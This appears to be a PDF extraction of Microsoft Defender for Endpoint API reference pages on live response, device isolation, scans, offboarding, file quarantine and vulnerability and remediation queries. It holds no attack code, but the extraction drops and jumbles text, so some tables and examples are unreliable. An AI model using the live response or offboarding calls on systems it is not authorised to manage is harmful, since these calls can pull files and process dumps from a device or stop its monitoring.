9PaZRcAZPjd%2bfbul3JNm1VqQPTLohT7wa0ymRiXpSST74xtFzuEBzNSNATdbngj3%2fwV4JesT
jZjIj5Dc%3d%3blumqauVlFuuO8MQffZgs0tLJ4Fq6fpeozPTdDf8Ll6XLegi079%2b4mSPFjTK0
y6eohstxdoOdom2wAHiZwk0u4KLKmRkfYOdT1wHY79qKoBQ3ZDHFTys9V%2fcwKGl%2bl8IenWDu
tHygn5IcA1y7GTZj4g%3d%3d\""
}
 Tip
Feedback

Get live response results
Article • 09/27/2023
Applies to:

） Important

７ Note
 Tip
API description
Retrieves a specific live response command result by its index.
Limitations
requirements:
Verify that you're running a supported version of Windows.
Devices must be running one of the following versions of Windows
Windows 11
Windows 10
Windows Server 2019 - Only applicable for Public preview

Windows Server 2022
Permissions
ﾉ Expand table
Application Machine.Read.All Read all machine profiles
Application Machine.ReadWrite.All Read and write all machine

information
Delegated (work or school Machine.LiveResponse Run live response on a specific

account) machine
HTTP request
HTTP
GET https://api.securitycenter.microsoft.com/api/machineactions/{machine
action
id}/GetLiveResponseResultDownloadLink(index={command-index})
Request headers
ﾉ Expand table
Request body
Empty
Response
If successful, this method returns 200, Ok response code with object that holds the link
to the command result in the value property. This link is valid for 30 minutes and should
be used immediately for downloading the package to a local storage. An expired link
can be re-created by another call, and there's no need to run live response again.
Runscript transcript properties:
ﾉ Expand table
script_name Executed script name
exit_code Executed script exit code
script_output Executed script standard output
script_errors Executed script standard error output
Example
Request example
HTTP
GET https://api.securitycenter.microsoft.com/api/machineactions/988cc94e-
7a8f-4b28-ab65-54970c5d5018/GetLiveResponseResultDownloadLink(index=0)
Response example
HTTP/1.1 200 Ok
JSON
{
"@odata.context":
"https://api.securitycenter.microsoft.com/api/$metadata#Edm.String",
"value": "https://core.windows.net/investigation-actions-
data/ID/CustomPlaybookCommandOutput/4ed5e7807ad1fe59b00b664fe06a0f07?
se=2021-02-04T16%3A13%3A50Z&sp=r&sv=2019-07-
07&sr=b&sig=1dYGe9rPvUlXBPvYSmr6/OLXPY98m8qWqfIQCBbyZTY%3D"
}
File content:
JSON
{
"script_name": "minidump.ps1",
"exit_code": 0,
"script_output": "Transcript started, output file is
C:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat
Protection\\Temp\\PSScriptOutputs\\PSScript_Transcript_{TRANSCRIPT_ID}.txt
C:\\windows\\TEMP\\OfficeClickToRun.dmp.zip\n51 MB\n\u0000\u0000\u0000",
"script_errors":""
}
Related articles
Get machine action API
Cancel machine action
Run live response
 Tip
Feedback

Isolate machine API
Article • 09/27/2023
Applies to:

７ Note
 Tip
API description
Isolates a device from accessing external network.
Limitations
７ Note
This page focuses on performing a machine action via API. See take response
actions on a machine for more information about response actions functionality
via Microsoft Defender for Endpoint.
） Important
Full isolation is available for devices on Windows 10, version 1703, and on
Windows 11.
Full isolation is available in public preview for all supported Microsoft
Defender for Endpoint on Linux listed in System requirements.
Selective isolation is available for devices on Windows 10, version 1709 or
later, and on Windows 11.
traffic.
Permissions
ﾉ Expand table
Application Machine.Isolate 'Isolate machine'
Delegated (work or school account) Machine.Isolate 'Isolate machine'
７ Note
HTTP request
HTTP
POST https://api.securitycenter.microsoft.com/api/machines/{id}/isolate
Request headers
ﾉ Expand table
Request body
ﾉ Expand table
IsolationType String Type of the isolation. Allowed values are: 'Full' or 'Selective'.
IsolationType controls the type of isolation to perform and can be one of the following:
Full: Full isolation

Selective: Restrict only limited set of applications from accessing the network (see
Isolate devices from the network for more details)
Response
the response body.
Example
Request
HTTP
POST
32e418702b84d0cc07/isolate
JSON
{
"Comment": "Isolate machine due to alert 1234",
"IsolationType": "Full"
}
To release a device from isolation, see Release device from isolation.
 Tip
Feedback

Release device from isolation API
Article • 09/27/2023
Applies to:

７ Note
 Tip
API description
Undo isolation of a device.
Limitations
７ Note
） Important
Full isolation is available for devices on Windows 10, version 1703.

Full isolation is available in public preview for all supported Microsoft
Defender for Endpoint on Linux listed in System requirements.
later.
traffic.
Permissions
ﾉ Expand table
Application Machine.Isolate 'Isolate machine'
Delegated (work or school account) Machine.Isolate 'Isolate machine'
７ Note
HTTP request
HTTP
POST https://api.securitycenter.microsoft.com/api/machines/{id}/unisolate
Request headers
ﾉ Expand table
Request body
ﾉ Expand table
Response
the response body.
If you send multiple API calls to remove isolation for the same device, it returns
"pending machine action" or HTTP 400 with the message "Action is already in progress".
Example
Request
HTTP
POST
32e418702b84d0cc07/unisolate
JSON
{
"Comment": "Unisolate machine since it was clean and validated"
}
To isolate a device, see Isolate device.
 Tip
Feedback

Restrict app execution API
Article • 11/15/2023
Applies to:

７ Note
 Tip
API description
Restrict execution of all applications on the device except a predefined set.
Limitations
７ Note
） Important
This action is available for devices on Windows 10, version 1709 or later, and
on Windows 11.
Code integrity policy formats and signing.
Permissions
ﾉ Expand table
Application Machine.RestrictExecution 'Restrict code execution'
Delegated (work or school account) Machine.RestrictExecution 'Restrict code execution'
７ Note
HTTP request
HTTP
POST
https://api.securitycenter.microsoft.com/api/machines/{id}/restrictCodeExecu
tion
Request headers
ﾉ Expand table
Request body
ﾉ Expand table
Response
the response body.
If you send multiple API calls to restrict app execution for the same device, it returns
Example
Request
HTTP
POST
32e418702b84d0cc07/restrictCodeExecution
JSON
{
"Comment": "Restrict code execution due to alert 1234"
}
To remove code execution restriction from a device, see Remove app restriction.
 Tip
Feedback

Remove app restriction API
Article • 09/27/2023
Applies to:

７ Note
 Tip
API description
Enable execution of any application on the device.
Limitations
７ Note
） Important
Full isolation is available for devices on Windows 10, version 1703.

later.
traffic.
Permissions
ﾉ Expand table
Application Machine.RestrictExecution 'Restrict code execution'
Delegated (work or school account) Machine.RestrictExecution 'Restrict code execution'
７ Note
HTTP request
HTTP
POST
https://api.securitycenter.microsoft.com/api/machines/{id}/unrestrictCodeExe
cution
Request headers
ﾉ Expand table
Request body
ﾉ Expand table
Response
the response body.
If you send multiple API calls to remove app restrictions for the same device, it returns
Example
Request
HTTP
POST
32e418702b84d0cc07/unrestrictCodeExecution
JSON
{
"Comment": "Unrestrict code execution since machine was cleaned and
validated"
}
To restrict code execution on a device, see Restrict app execution.
 Tip
Feedback

Run antivirus scan API
Article • 09/27/2023
Applies to:

７ Note
 Tip
API description
Initiate Microsoft Defender Antivirus scan on a device.
Limitations
７ Note
） Important
This action is available for devices on Windows 10, version 1709 or later, and
on Windows 11.
Permissions
ﾉ Expand table
Application Machine.Scan 'Scan machine'
Delegated (work or school account) Machine.Scan 'Scan machine'
７ Note
HTTP request
HTTP
POST
https://api.securitycenter.microsoft.com/api/machines/{id}/runAntiVirusScan
Request headers
ﾉ Expand table
Content-Type string application/json
Request body
ﾉ Expand table
ScanType String Defines the type of the Scan. Required.
ScanType controls the type of scan to perform and can be one of the following:
Quick: Perform quick scan on the device

Full: Perform full scan on the device
Response
If successful, this method returns 201, Created response code and MachineAction object
in the response body.
If you send multiple API calls to run an antivirus scan for the same device, it returns
Example
Request
HTTP
POST
32e418702b84d0cc07/runAntiVirusScan
JSON
{
"Comment": "Check machine for viruses due to alert 3212",
"ScanType": "Full"
}
 Tip
Feedback

Run live response commands on a
device
Article • 11/22/2023
Applies to:
） Important

７ Note
 Tip
API description
Runs a sequence of live response commands on a device
Limitations
1. Rate limitations for this API are 10 calls per minute (additional requests are
responded with HTTP 429).
2. 25 concurrently running sessions (requests exceeding the throttling limit receives a

"429 - Too many requests" response).
3. If the machine isn't available, the session is queued for up to three days.
4. RunScript command timeouts after 10 minutes.
5. Live response commands can't be queued up and can only be executed one at a
time.
6. If the machine that you're trying to run this API call is in an RBAC device group that
doesn't have an automated remediation level assigned to it, you need to at least
enable the minimum Remediation Level for a given Device Group.
７ Note
2.
7. Multiple live response commands can be run on a single API call. However, when a
live response command fails all the subsequent actions won't be executed.
8. Multiple live response sessions can't be executed on the same machine (if live
response action is already running, subsequent requests are responded to with
HTTP 400 - ActiveRequestAlreadyExists).
７ Note
Live response actions initiated from the Device page are not available in the
machineactions API.
Minimum Requirements
requirements:
Verify that you're running a supported Windows, macOS, or Linux version.
Devices must be running one of the following:

Windows 11
Windows 10
Windows Server 2019 - Only applicable for Public preview

Windows Server 2022
macOS (requires additional configuration profiles)

13 (Ventura)
12 (Monterey)
11 (Big Sur)
Linux
Supported Linux server distributions and kernel versions
Permissions
ﾉ Expand table
Application Machine.LiveResponse Run live response on a specific

machine
Delegated (work or school Machine.LiveResponse Run live response on a specific

account) machine
HTTP request
HTTP
POST
https://api.securitycenter.microsoft.com/API/machines/{machine_id}/runlivere
sponse
Request headers
ﾉ Expand table
Request body
ﾉ Expand table
Comment String Comment to associate with the action.
Commands Array Commands to run. Allowed values are PutFile, RunScript, GetFile (must be
in this order with no limit on repetitions).
Commands
ﾉ Expand table
Command Parameters Description

Type
PutFile Key: FileName Puts a file from the library to the device. Files are saved in a
Value: <file working folder and are deleted when the device restarts by
name> default. NOTE: Doesn't have a response result.
RunScript Key: ScriptName Runs a script from the library on a device.

Value: <Script The Args parameter is passed to your script.
from library>
Timeouts after 10 minutes.
Key: Args
Value: <Script
arguments>
GetFile Key: Path Collect file from a device. NOTE: Backslashes in path must be
Value: <File escaped.
Command Parameters Description
Type
path>
Response
If successful, this method returns 201 Created.
Action entity. If machine with the specified ID wasn't found - 404 Not Found.
Example
Request example
HTTP
POST
32e418702b84d0cc07/runliveresponse
```JSON
{
"Commands":[
{
"type":"RunScript",
"params":[
{
"key":"ScriptName",
"value":"minidump.ps1"
},
{
"key":"Args",
"value":"OfficeClickToRun"
}
]
},
{
"type":"GetFile",
"params":[
{
"key":"Path",
"value":"C:\\windows\\TEMP\\OfficeClickToRun.dmp.zip"
}
]
}
],
"Comment":"Testing Live Response API"
}
Response example
Possible values for each command status are "Created", "Completed", and "Failed".
HTTP
HTTP/1.1 200 Ok
JSON
{
"@odata.context":
"https://api.securitycenter.microsoft.com/api/$metadata#MachineActions/$enti
ty",
"id": "{machine_action_id}",
"type": "LiveResponse",
"requestor": "analyst@microsoft.com",
"requestorComment": "Testing Live Response API",
"status": "Pending",
"machineId": "{machine_id}",
"computerDnsName": "hostname",
"errorHResult": 0,
"commands": [
{
"index": 0,
"startTime": null,
"endTime": null,
"commandStatus": "Created",
"errors": [],
"command": {
"type": "RunScript",
"params": [
{
"key": "ScriptName",
"value": "minidump.ps1"
},{
"key": "Args",
"value": "OfficeClickToRun"
}
]
}
}, {
"index": 1,
"startTime": null,
"endTime": null,
"commandStatus": "Created",
"errors": [],
"command": {
"type": "GetFile",
"params": [{
"key": "Path", "value":
"C:\\windows\\TEMP\\OfficeClickToRun.dmp.zip"
}
]
}
}
]
}
Related topics
Get live response result
Cancel machine action
 Tip
Feedback

Offboard machine API
Article • 12/13/2023
Applies to:

７ Note
 Tip
API description
Offboard device from Defender for Endpoint.
Limitations
７ Note
actions on a machine for more information about response actions
functionality via Microsoft Defender for Endpoint.
７ Note
This API is supported on Windows 11, Windows 10, version 1703 and later; on
Windows Server 2019 and later; and on Windows Server 2012 R2 and
Windows Server 2016 when using the new, unified agent for Defender for
Endpoint.
This API is not supported on macOS or Linux devices.
Running the offboarding API only stops the sensor service from running, but it
does not remove the onboarding information from the registry like an
offboarding script does.
Permissions
ﾉ Expand table
Application Machine.Offboard 'Offboard machine'
Delegated (work or school account) Machine.Offboard 'Offboard machine'
７ Note
The user needs to 'Global Admin' AD role

HTTP request
HTTP
POST https://api.securitycenter.microsoft.com/api/machines/{id}/offboard
The machine ID can be found in the URL when you select the device. Generally, it's a 40
digit alphanumeric number that can be found in the URL.
Request headers
ﾉ Expand table
Request body
ﾉ Expand table
Response
the response body.
Example
Request
Here's an example of the request. If there's no JSON comment added, it will error out
with code 400.
HTTP
POST
32e418702b84d0cc07/offboard
JSON
{
"Comment": "Offboard machine by automation"
}
 Tip
Feedback

Stop and quarantine file API
Article • 09/27/2023
Applies to:

７ Note
 Tip
API description
Stop execution of a file on a device and delete it.
Limitations
７ Note
） Important
later, or Windows 11
Microsoft
Permissions
ﾉ Expand table
Application Machine.StopAndQuarantine 'Stop And Quarantine'

information'
Delegated (work or school Machine.StopAndQuarantine 'Stop And Quarantine'

account)
７ Note
HTTP request
HTTP
POST
https://api.securitycenter.microsoft.com/api/machines/{id}/StopAndQuarantine
File
Request headers
ﾉ Expand table
Request body
ﾉ Expand table
Sha1 String Sha1 of the file to stop and quarantine on the device. Required.
Response
the response body.
Example
Request
HTTP
POST
32e418702b84d0cc07/StopAndQuarantineFile
JSON
{
"Comment": "Stop and quarantine file on machine due to alert
441688558380765161_2136280442",
"Sha1": "87662bc3d60e4200ceaf7aae249d1c343f4b83c9"
}
 Tip
Feedback

Cancel machine action API
Article • 09/27/2023
Applies to:

） Important

７ Note
 Tip
API description
Cancel an already launched machine action that isn't yet in final state (completed,
canceled, failed).
Limitations
Permissions
ﾉ Expand table
Permission type Permission Permission display

name
Application Machine.CollectForensics Collect forensics

Machine.Isolate Isolate machine
Machine.RestrictExecution Restrict code
Machine.Scan execution
Machine.Offboard Scan machine
Machine.StopAndQuarantine Offboard machine
Machine.LiveResponse Stop And Quarantine
Run live response on
a specific machine
Delegated (work or Machine.CollectForensics Collect forensics

school account) Machine.Isolate Isolate machine
Machine.RestrictExecution Restrict code
Machine.Scan execution
Machine.Offboard Scan machine
Machine.StopAndQuarantineMachine.LiveResponse Offboard machine
Stop And Quarantine
Run live response on
a specific machine
HTTP request
HTTP
POST
https://api.securitycenter.microsoft.com/api/machineactions/<machineactionid
>/cancel
Request headers
ﾉ Expand table
Request body
ﾉ Expand table
Comment String Comment to associate with the cancellation action.
Response
If successful, this method returns 200, OK response code with a Machine Action entity. If
machine action entity with the specified id wasn't found - 404 Not Found.
Example
Request
HTTP
POST
https://api.securitycenter.microsoft.com/api/machineactions/988cc94e-7a8f-
4b28-ab65-54970c5d5018/cancel
JSON
{
"Comment": "Machine action was canceled by automation"
}
Related article
 Tip
Feedback

Recommendation resource type
Article • 02/22/2024
Applies to:

７ Note
 Tip
） Important

Methods
ﾉ Expand table
List all recommendations Recommendation Retrieves a list of all security

collection recommendations affecting the organization
Get recommendation by Recommendation Retrieves a security recommendation by its

ID ID
Get recommendation Software Retrieves a security recommendation related

software to a specific software
Get recommendation MachineRef collection Retrieves a list of devices associated with the
devices security recommendation
Get recommendation Vulnerability Retrieves a list of vulnerabilities associated

vulnerabilities collection with the security recommendation
Properties
ﾉ Expand table
id String Recommendation ID
productName String Related software name
recommendationName String Recommendation name
Weaknesses Long Number of discovered vulnerabilities
Vendor String Related vendor name
recommendedVersion String Recommended version
recommendedProgram String Recommended program
recommendedVendor String Recommended vendor
recommendationCategory String Recommendation category. Possible values are:

Accounts , Application , Network , OS ,
SecurityControls
subCategory String Recommendation subcategory
severityScore Double Potential impact of the configuration to the

organization's Microsoft Secure Score for Devices
(1-10)
publicExploit Boolean Public exploit is available
activeAlert Boolean Active alert is associated with this recommendation
associatedThreats String Threat analytics report is associated with this

collection recommendation
remediationType String Remediation type. Possible values are:

ConfigurationChange , Update , Upgrade , Uninstall
Status Enum Recommendation exception status. Possible values

are: Active and Exception
configScoreImpact Double Microsoft Secure Score for Devices impact
exposureImpact Double Exposure score impact
totalMachineCount Long Number of installed devices
exposedMachinesCount Long Number of installed devices that are exposed to

vulnerabilities
nonProductivityImpactedAssets Long Number of devices that aren't affected
relatedComponent String Related software component
 Tip
Feedback

List all recommendations
Article • 09/27/2023
Applies to:

７ Note
 Tip
） Important

Retrieves a list of all security recommendations affecting the organization.
API description
Returns information about all security recommendations affecting the organization.
URL: GET:/api/recommendations
$filter on: id , productName , vendor , recommendedVersion , recommendationCategory ,
subCategory , severityScore , remediationType , recommendedProgram , recommendedVendor ,
and status properties.

$skip .
Permissions
ﾉ Expand table

Management security

HTTP request
HTTP
GET /api/recommendations
Request headers
ﾉ Expand table

Request body
Empty
Response
If successful, this method returns 200 OK with the list of security recommendations in
the body.
Example
Request
HTTP
GET https://api.securitycenter.microsoft.com/api/recommendations
Response
JSON
{
"@odata.context":
"https://api.securitycenter.microsoft.com/api/$metadata#Recommendations",
"value": [
{
"id": "va-_-microsoft-_-windows_10" "va-_-microsoft-_-
windows_11",
"productName": "windows_10" "Windows_11",
"recommendationName": "Update Windows 10" "Update Windows 11",
"weaknesses": 397,
"recommendedVersion": "",
"subCategory": "",
"severityScore": 0,
"associatedThreats": [
"3098b8ef-23b1-46b3-aed4-499e1928f9ed",
"40c189d5-0330-4654-a816-e48c2b7f9c4b",
"4b0c9702-9b6c-4ca2-9d02-1556869f56f8",
"e8fc2121-3cf3-4dd2-9ea0-87d7e1d2b29d",
"94b6e94b-0c1d-4817-ac06-c3b8639be3ab"
],
"status": "Active",
"exposureImpact": 7.674418604651163,
"relatedComponent": "Windows 10" "Windows 11"
}
...
]
}
See also
Vulnerability management security recommendations
 Tip
Feedback

Get recommendation by ID
Article • 09/27/2023
Applies to:

７ Note
 Tip
） Important

Retrieves a security recommendation by its ID.
Permissions
ﾉ Expand table

Management security

HTTP request
HTTP
GET /api/recommendations/{id}
Request headers
ﾉ Expand table
Request body
Empty
Response
If successful, this method returns 200 OK with the security recommendations in the
body.
Example
Request example
HTTP
GET https://api.securitycenter.microsoft.com/api/recommendations/va-_-
google-_-chrome
Response example
JSON
{
"@odata.context":
"https://api.securitycenter.microsoft.com/api/$metadata#Recommendations/$ent
ity",
"id": "va-_-google-_-chrome",
"productName": "chrome",
"recommendationName": "Update Chrome",
"weaknesses": 38,
"vendor": "google",
"recommendedVersion": "",
"subCategory": "",
"severityScore": 0,
"associatedThreats": [],
"status": "Active",
"exposureImpact": 3.9441860465116285,
"relatedComponent": "Chrome"
}
Related topics
 Tip
Feedback

List software by recommendation
Article • 09/27/2023
Applies to:
７ Note
 Tip
） Important

Retrieves a security recommendation related to a specific software.
Permissions
ﾉ Expand table
Application Software.Read.All 'Read Threat and Vulnerability

Management Software information'

school account) Management security recommendation
information'
HTTP request
HTTP
GET /api/recommendations/{id}/software
Request headers
ﾉ Expand table
Request body
Empty
Response
If successful, this method returns 200 OK with the software associated with the security
recommendations in the body.
Example
Request example
HTTP
google-_-chrome/software
Response example
JSON
{
"@odata.context":
"https://api.securitycenter.microsoft.com/api/$metadata#Analytics.Contracts.
PublicAPI.PublicProductDto",
"id": "google-_-chrome",
"name": "chrome",
"vendor": "google",
"weaknesses": 38,
}
Related topics
 Tip
Feedback

List devices by recommendation
Article • 09/27/2023
Applies to:

７ Note
 Tip
） Important

Retrieves a list of devices associated with the security recommendation.
Permissions
ﾉ Expand table

Management security

HTTP request
HTTP
GET /api/recommendations/{id}/machineReferences
Request headers
ﾉ Expand table
Request body
Empty
Response
If successful, this method returns 200 OK with the list of devices associated with the
security recommendation.
Example
Request example
HTTP
google-_-chrome/machineReferences
Response example
JSON
{
"@odata.context":
"https://api.securitycenter.microsoft.com/api/$metadata#MachineReferences",
"value": [
{
"id": "e058770379bc199a9c179ce52a23e16fd44fd2ee",
"computerDnsName": "niw_pc",
"rbacGroupName": "GroupTwo"
}
...
]
}
Related topics
 Tip
Feedback

List vulnerabilities by recommendation
Article • 09/27/2023
Applies to:

７ Note
 Tip
） Important

Retrieves a list of vulnerabilities associated with the security recommendation.
Permissions
ﾉ Expand table

security recommendation information'

school account) security recommendation information'
HTTP request
HTTP
GET /api/recommendations/{id}/vulnerabilities
Request headers
ﾉ Expand table
Request body
Empty
Response
If successful, this method returns 200 OK, with the list of vulnerabilities associated with
the security recommendation.
Example
Request example
HTTP
google-_-chrome/vulnerabilities
Response example
JSON
{
"@odata.context":
"value": [
{
"id": "CVE-2019-13748",
"name": "CVE-2019-13748",
"description": "Insufficient policy enforcement in developer
tools in Google Chrome prior to 79.0.3945.79 allowed a local attacker to
obtain potentially sensitive information from process memory via a crafted
HTML page.",
"cvssV3": 6.5,
"publishedOn": "2019-12-10T00:00:00Z",
"updatedOn": "2019-12-16T12:15:00Z",
"exploitTypes": [],
"exploitUris": []
}
...
]
}
Related topics
 Tip
Feedback

Remediation activity methods and
properties
Article • 09/27/2023
Applies to:


） Important

７ Note
 Tip
The API response contains Microsoft Defender Vulnerability Management remediation
activities that have been created in your tenant.
Methods
ﾉ Expand table
List all remediation activities Investigation Returns information about all remediation
collection activities.
List exposed devices of one Investigation Returns information about exposed devices
remediation activity entity for the specified remediation activity.
Get one remediation activity Investigation Returns information for the specified
by ID entity remediation activity.
Learn more about remediation activities.
Properties
ﾉ Expand table
Property ID Data Description

type
Category String Category of the remediation activity

(Software/Security configuration)
completerEmail String If the remediation activity was manually

completed by someone, this column contains
their email
completerId String If the remediation activity was manually

completed by someone, this column contains
their object ID
completionMethod String A remediation activity can be completed

"automatically" (if all the devices are patched)
or "manually" by a person who selects "mark
as completed."
createdOn DateTime Time this remediation activity was created
Description String Description of this remediation activity

type
dueOn DateTime Due date the creator set for this remediation
activity
fixedDevices The number of devices that have been fixed
ID String ID of this remediation activity
nameId String Related product name
Priority String Priority the creator set for this remediation

activity (High\Medium\Low)
productId String Related product ID
productivityImpactRemediationType String A few configuration changes could be

requested only for devices that don't affect
users. This value indicates the selection
between "all exposed devices" or "only devices
with no user impact."
rbacGroupNames String Related device group names
recommendedProgram String Recommended program to upgrade to
recommendedVendor String Recommended vendor to upgrade to
recommendedVersion String Recommended version to update/upgrade to
relatedComponent String Related component of this remediation activity

(similar to the related component for a security
recommendation)
requesterEmail String Creator email address
requesterId String Creator object ID
requesterNotes String The notes (free text) the creator added for this
remediation activity
Scid String SCID of the related security recommendation
Status String Remediation activity status (Active/Completed)
statusLastModifiedOn DateTime Date when the status field was updated
targetDevices Long Number of exposed devices that this

remediation is applicable to
Title String Title of this remediation activity

type
Type String Remediation type
vendorId String Related vendor name
See also
Get one remediation activity by ID
List all remediation activities
List exposed devices of one remediation activity
 Tip
Feedback

Article • 09/27/2023
Applies to:

Want to experience Microsoft Defender Vulnerability Management? Learn more about

how you can sign up to the Microsoft Defender Vulnerability Management public preview
trial.
） Important

substantially modified before it's commercially released. Microsoft makes no warranties,
express or implied, with respect to the information provided here.
７ Note
If you are a US Government customer, please use the URIs listed in Microsoft Defender
for Endpoint for US Government customers.
 Tip
API description
Returns information for the specified remediation activity. Presents the same columns as Get
all remediation activity", but returns results only for the one specified remediation activity.
List a specified remediation activity for (ID)

URL: GET: /api/remediationTasks/{id}
Permissions
One of the following permissions is required to call this API. To learn more, including how to
choose permissions, see Use Microsoft Defender for Endpoint APIs for details.
ﾉ Expand table
Application RemediationTasks.Read.All 'Read Threat and Vulnerability Management

Delegated (work or RemediationTask.Read.Read 'Read Threat and Vulnerability Management

Properties
ﾉ Expand table

type
Category String Category of the Software

(Software/Security
configuration)
completerEmail String If the remediation Null

activity was
manually
completed by
someone, this
column contains
their email
completerId String If the remediation Null

activity was
manually
type
completed by
someone, this
column contains
their object ID
completionMethod String A remediation Automatic

activity can be
completed
"automatically" (if
all the devices are
patched) or
"manually" by a
person who selects
"mark as
completed"
createdOn DateTime Time this 2021-01-12T18:54:11.5499478Z

was created
Description String Description of this Update Microsoft Silverlight to a later

remediation activity version to mitigate known
vulnerabilities affecting your devices.
dueOn DateTime Due date the 2021-01-13T00:00:00Z

creator set for this
fixedDevices The number of 2

devices that have
been fixed
ID String ID of this 097d9735-5479-4899-b1b7-

remediation activity 77398899df92
nameId String Related product Microsoft Silverlight

name
Priority String Priority the creator High

set for this
(High\Medium\Low)
productId String Related product ID microsoft-_-silverlight
productivityImpactRemediationType String A few configuration AllExposedAssets

changes could be
requested only for
devices that don't
affect users. This
value indicates the
type
selection between
"all exposed
devices" or "only
devices with no
user impact."
rbacGroupNames String Related device [ "Windows Servers", "Windows 11",

group names "Windows 10" ]
recommendedProgram String Recommended Null

program to
upgrade to
recommendedVendor String Recommended Null

vendor to upgrade
to
recommendedVersion String Recommended Null

version to
update/upgrade to
relatedComponent String Related component Microsoft Silverlight

of this remediation
activity (similar to
the related
component for a
security
recommendation)
requesterEmail String Creator email globaladmin@UserName.contoso.com

address
requesterId String Creator object ID r647211f-2e16-43f2-a480-

16ar3a2a796r
requesterNotes String The notes (free text) Null

the creator added
for this remediation
activity
Scid String SCID of the related Null

security
recommendation
Status String Remediation activity Active

status
(Active/Completed)
statusLastModifiedOn DateTime Date when the 2021-01-12T18:54:11.5499487Z

status field was
updated
type
targetDevices Long Number of exposed 43

devices that this
remediation is
applicable to
Title String Title of this Microsoft Silverlight

Type String Remediation type Update
vendorId String Related vendor Microsoft

name
Example
Request example
HTTP
GET https://api.securitycenter.windows.com/api/remediationtasks/03942ef5-aecb-
4c6e-b555-d6a97013844c
Response example
JSON
{
"@odata.context":
"https://api.securitycenter.windows.com/api/$metadata#RemediationTasks/$entity",
"id": "03942ef5-aecb-4c6e-b555-d6a97013844c",
"title": "Update Microsoft Silverlight",
"createdOn": "2021-02-10T13:20:36.4718166Z",
"requesterId": "65548a1d-efo0-4a7a-8d19-1b967b5c36f4",
"requesterEmail": "user1@contoso.com",
"status": "Active",
"statusLastModifiedOn": "2021-02-10T13:20:36.4719698Z",
"description": "Update Silverlight to a later version to mitigate 55 known
vulnerabilities affecting your devices. Doing so can help lessen the security
risk to your organization due to versions which have reached their end-of-
support.",
"relatedComponent": "Microsoft Silverlight",
"targetDevices": 18511,
"rbacGroupNames": [
"UnassignedGroup",
"hhh"
],
"fixedDevices": 2866,
"requesterNotes": "test",
"dueOn": "2021-02-11T00:00:00Z",
"category": "Software",
"productivityImpactRemediationType": null,
"priority": "Medium",
"completionMethod": null,
"completerId": null,
"completerEmail": null,
"scid": null,
"type": "Update",
"productId": "microsoft-_-silverlight",
"vendorId": "microsoft",
"nameId": "silverlight",
"recommendedVersion": null,
"recommendedVendor": null,
"recommendedProgram": null
}
See also
Remediation methods and properties
 Tip
Do you want to learn more? Engage with the Microsoft Security community in our Tech
Community: Microsoft Defender for Endpoint Tech Community .
Feedback

Article • 09/27/2023
Applies to:

Want to experience Microsoft Defender Vulnerability Management? Learn more about

how you can sign up to the Microsoft Defender Vulnerability Management public preview
trial.
） Important

substantially modified before it's commercially released. Microsoft makes no warranties,
express or implied, with respect to the information provided here.
７ Note
If you are a US Government customer, please use the URIs listed in Microsoft Defender
for Endpoint for US Government customers.
 Tip
API description
Returns information about all remediation activities.
URL: GET: /api/remediationTasks

$filter on: createdon and status properties.

$skip .
Permissions
One of the following permissions is required to call this API. To learn more, including how to
choose permissions, see Use Microsoft Defender for Endpoint APIs for details.
ﾉ Expand table
Application RemediationTasks.Read.All 'Read Threat and Vulnerability Management

Delegated (work or RemediationTask.Read 'Read Threat and Vulnerability Management

Properties
ﾉ Expand table

type
Category String Category of the Software

(Software/Security
configuration)
completerEmail String If the remediation Null

activity was
manually
completed by
someone, this
column contains
their email
completerId String If the remediation Null

activity was
type
manually
completed by
someone, this
column contains
their object ID
completionMethod String A remediation Automatic

activity can be
completed
"automatically" (if
all the devices are
patched) or
"manually" by a
person who selects
"mark as
completed"
createdOn DateTime Time this 2021-01-12T18:54:11.5499478Z

was created
Description String Description of this Update Microsoft Silverlight to a later

remediation activity version to mitigate known
vulnerabilities affecting your devices.
dueOn DateTime Due date the 2021-01-13T00:00:00Z

creator set for this
fixedDevices . The number of 2

devices that have
been fixed
ID String ID of this 097d9735-5479-4899-b1b7-

remediation activity 77398899df92
nameId String Related product Microsoft Silverlight

name
Priority String Priority the creator High

set for this
(High\Medium\Low)
productId String Related product ID microsoft-_-silverlight
productivityImpactRemediationType String A few configuration AllExposedAssets

changes could be
requested only for
devices that don't
affect users. This
type
value indicates the

selection between
"all exposed
devices" or "only
devices with no
user impact."
rbacGroupNames String Related device [ "Windows Servers", "Windows 11",

group names "Windows 10" ]
recommendedProgram String Recommended Null

program to
upgrade to
recommendedVendor String Recommended Null

vendor to upgrade
to
recommendedVersion String Recommended Null

version to
update/upgrade to
relatedComponent String Related component Microsoft Silverlight

of this remediation
activity (similar to
the related
component for a
security
recommendation)
requesterEmail String Creator email globaladmin@UserName.contoso.com

address
requesterId String Creator object ID r647211f-2e16-43f2-a480-

16ar3a2a796r
requesterNotes String The notes (free text) Null

the creator added
for this remediation
activity
Scid String SCID of the related Null

security
recommendation
Status String Remediation activity Active

status
(Active/Completed)
statusLastModifiedOn DateTime Date when the 2021-01-12T18:54:11.5499487Z

status field was
type
updated
targetDevices Long Number of exposed 43

devices that this
remediation is
applicable to
Title String Title of this Update Microsoft Silverlight

Type String Remediation type Update
vendorId String Related vendor Microsoft

name
Example
Request example
HTTP
GET https://api.securitycenter.windows.com/api/remediationtasks/
Response example
JSON
{
"@odata.context":
"https://api.securitycenter.windows.com/api/$metadata#RemediationTasks",
"value": [
{
"id": "03942ef5-aewb-4w6e-b555-d6a97013844w",
"title": "Update Microsoft Silverlight",
"createdOn": "2021-02-10T13:20:36.4718166Z",
"requesterId": "65548a1d-ef00-4a7a-8d19-1b967b5c36f4",
"requesterEmail": "user1@contoso.com",
"status": "Active",
"statusLastModifiedOn": "2021-02-10T13:20:36.4719698Z",
"description": "Update Silverlight to a later version to mitigate 55
known vulnerabilities affecting your devices. Doing so can help lessen the
security risk to your organization due to versions which have reached their end-
of-support.",
"relatedComponent": "Microsoft Silverlight",
"targetDevices": 18511,
"rbacGroupNames": [
"UnassignedGroup",
"hhh"
],
"fixedDevices": 2866,
"requesterNotes": "test",
"dueOn": "2021-02-11T00:00:00Z",
"category": "Software",
"productivityImpactRemediationType": null,
"priority": "Medium",
"completionMethod": null,
"completerId": null,
"completerEmail": null,
"scid": null,
"type": "Update",
"productId": "microsoft-_-silverlight",
"vendorId": "microsoft",
"nameId": "silverlight",
"recommendedVersion": null,
"recommendedVendor": null,
"recommendedProgram": null
}
]
}
See also
 Tip
Feedback

List exposed devices of one remediation
activity
Article • 11/15/2023
Applies to:

） Important

７ Note
 Tip
